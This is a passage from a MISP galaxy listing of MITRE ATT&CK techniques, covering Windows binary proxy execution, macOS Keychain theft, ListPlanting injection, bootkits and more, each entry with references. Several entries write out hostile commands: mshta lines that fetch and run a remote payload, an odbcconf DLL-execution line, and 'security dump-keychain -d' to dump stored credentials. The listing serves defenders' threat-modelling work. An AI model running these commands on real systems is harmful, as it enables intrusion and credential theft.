https://lolbas-project.github.io/lolbas/Binaries/Msbuild/

https://msdn.microsoft.com/library/dd393574.aspx

Keylogging - T1417.001

Adversaries may log user keystrokes to intercept credentials or other information from the user as the user types them.

Some methods of keylogging include:

  • Masquerading as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.

  • Abusing accessibility features. On Android, adversaries may abuse accessibility features to record keystrokes by registering an AccessibilityService class, overriding the onAccessibilityEvent method, and listening for the AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED event type. The event object passed into the function will contain the data that the user typed.

Additional methods of keylogging may be possible if root access is available.

The tag is: misp-galaxy:mitre-attack-pattern="Keylogging - T1417.001"

Table 6363. Table References

Links

https://attack.mitre.org/techniques/T1417/001

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html

https://zeltser.com/third-party-keyboards-security/

Sharepoint - T1213.002

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following kinds of information may hold potential value to an adversary and may also be found on SharePoint:

  • Policies, procedures, and standards

  • Physical / logical network diagrams

  • System architecture diagrams

  • Technical system documentation

  • Testing / development credentials

  • Work / project schedules

  • Source code snippets

  • Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002"

Table 6364. Table References

Links

https://attack.mitre.org/techniques/T1213/002

https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2

CMSTP - T1218.003

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003"

Table 6365. Table References

Links

http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://attack.mitre.org/techniques/T1218/003

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)

https://github.com/api0cradle/UltimateAppLockerByPassList

https://msitpros.com/?p=3960

https://twitter.com/ItsReallyNick/status/958789644165894146

https://twitter.com/NickTyrer/status/958450014111633408

InstallUtil - T1218.004

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004"

Table 6366. Table References

Links

https://attack.mitre.org/techniques/T1218/004

https://lolbas-project.github.io/lolbas/Binaries/Installutil/

https://msdn.microsoft.com/en-us/library/50614e95.aspx

Mshta - T1218.005

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005"

Table 6367. Table References

Links

https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/

https://attack.mitre.org/techniques/T1218/005

https://en.wikipedia.org/wiki/HTML_Application

https://lolbas-project.github.io/lolbas/Binaries/Mshta/

https://msdn.microsoft.com/library/ms536471.aspx

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/

Hardware - T1592.001

Adversaries may gather information about the victim’s host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).

The tag is: misp-galaxy:mitre-attack-pattern="Hardware - T1592.001"

Table 6368. Table References

Links

https://attack.mitre.org/techniques/T1592/001

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Geofencing - T1627.001

Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)

[Geofencing](https://attack.mitre.org/techniques/T1627/001) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.

One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1627/001) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1627/001) methods, this requires that the user has granted the ACCESS_FINE_LOCATION and ACCESS_BACKGROUND_LOCATION permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include "Allow only while using the app", which will effectively prohibit background location collection.

Similarly, on iOS, developers can use built-in APIs to set up and execute geofencing. Depending on the use case, the app will need to call either requestWhenInUseAuthorization() or requestAlwaysAuthorization(), according to when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.

[Geofencing](https://attack.mitre.org/techniques/T1627/001) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific input prompts and/or advertisements.

The tag is: misp-galaxy:mitre-attack-pattern="Geofencing - T1627.001"

Table 6369. Table References

Links

https://attack.mitre.org/techniques/T1627/001

https://blog.lookout.com/esurv-research

Msiexec - T1218.007

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007"

Table 6370. Table References

Links

https://attack.mitre.org/techniques/T1218/007

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated

https://lolbas-project.github.io/lolbas/Binaries/Msiexec/

Odbcconf - T1218.008

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008"

Table 6371. Table References

Links

https://attack.mitre.org/techniques/T1218/008

https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

Keychain - T1634.001

Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.

On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, adversaries can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1634.001"

Table 6372. Table References

Links

https://attack.mitre.org/techniques/T1634/001

https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/

https://developer.apple.com/documentation/security/keychain_services

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

Domains - T1583.001

Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Domains - T1583.001"

Table 6373. Table References

Links

https://attack.mitre.org/techniques/T1583/001

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html

https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/

https://threatconnect.com/blog/infrastructure-research-hunting/

https://us-cert.cisa.gov/ncas/alerts/aa20-258a

https://us-cert.cisa.gov/ncas/tips/ST05-016

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/

https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/

https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/

https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/

https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Domains - T1584.001

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)

Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Domains - T1584.001"

Table 6374. Table References

Links

https://attack.mitre.org/techniques/T1584/001

https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover

https://krebsonsecurity.com/2019/02/a-deep-dive-on-the-recent-widespread-dns-hijacking-attacks/

https://unit42.paloaltonetworks.com/domain-shadowing/

https://www.icann.org/groups/ssac/documents/sac-007-en

Keychain - T1555.001

Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility <code>security</code>. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann)

Adversaries may gather user credentials from Keychain storage/memory. For example, the command <code>security dump-keychain -d</code> will dump all Login Keychain credentials from <code>~/Library/Keychains/login.keychain-db</code>. Adversaries may also directly read Login Keychain credentials from the <code>~/Library/Keychains/login.keychain</code> file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001"

Table 6375. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1555/001

https://developer.apple.com/documentation/security/keychain_services

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py

https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption

https://www.netmeister.org/blog/keychain-passwords.html

ListPlanting - T1055.015

Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.

List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application’s list-view settings is stored within the process' memory in a <code>SysListView32</code> control.

ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.

Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)

Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.

The tag is: misp-galaxy:mitre-attack-pattern="ListPlanting - T1055.015"

Table 6376. Table References

Links

https://attack.mitre.org/techniques/T1055/015

https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview

https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Launchctl - T1569.001

Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)

Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: <code>launchctl load</code>, <code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <code>/bin/launchctl load</code> to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001"

Table 6377. Table References

Links

https://attack.mitre.org/techniques/T1569/001

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://ss64.com/osx/launchctl.html

Malware - T1587.001

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed to communicate with Twitter for C2 may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1587.001"

Table 6378. Table References

Links

https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/

https://attack.mitre.org/techniques/T1587/001

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

Malware - T1588.001

Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1588.001"

Table 6379. Table References

Links

https://attack.mitre.org/techniques/T1588/001

https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

Credentials - T1589.001

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization, or they may be credentials gathered elsewhere in an attempt to take advantage of the tendency for users to reuse the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from the dark web or other black markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001"

Table 6380. Table References

Links

https://attack.mitre.org/techniques/T1589/001

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://github.com/dxa4481/truffleHog

https://github.com/michenriksen/gitrob

https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/

https://sec.okta.com/scatterswine

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196

https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/

https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/

Software - T1592.002

Adversaries may gather information about the victim’s host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Software - T1592.002"

Table 6381. Table References

Links

https://attack.mitre.org/techniques/T1592/002

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Bootkit - T1542.003

Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"

Table 6382. Table References

Links

http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

https://attack.mitre.org/techniques/T1542/003

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

Firmware - T1592.003

Adversaries may gather information about the victim’s host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Firmware - T1592.003"

Table 6383. Table References

Links

https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/

https://attack.mitre.org/techniques/T1592/003

ROMMONkit - T1542.004

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004"

Table 6384. Table References

Links

https://attack.mitre.org/techniques/T1542/004

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Screensaver - T1546.002

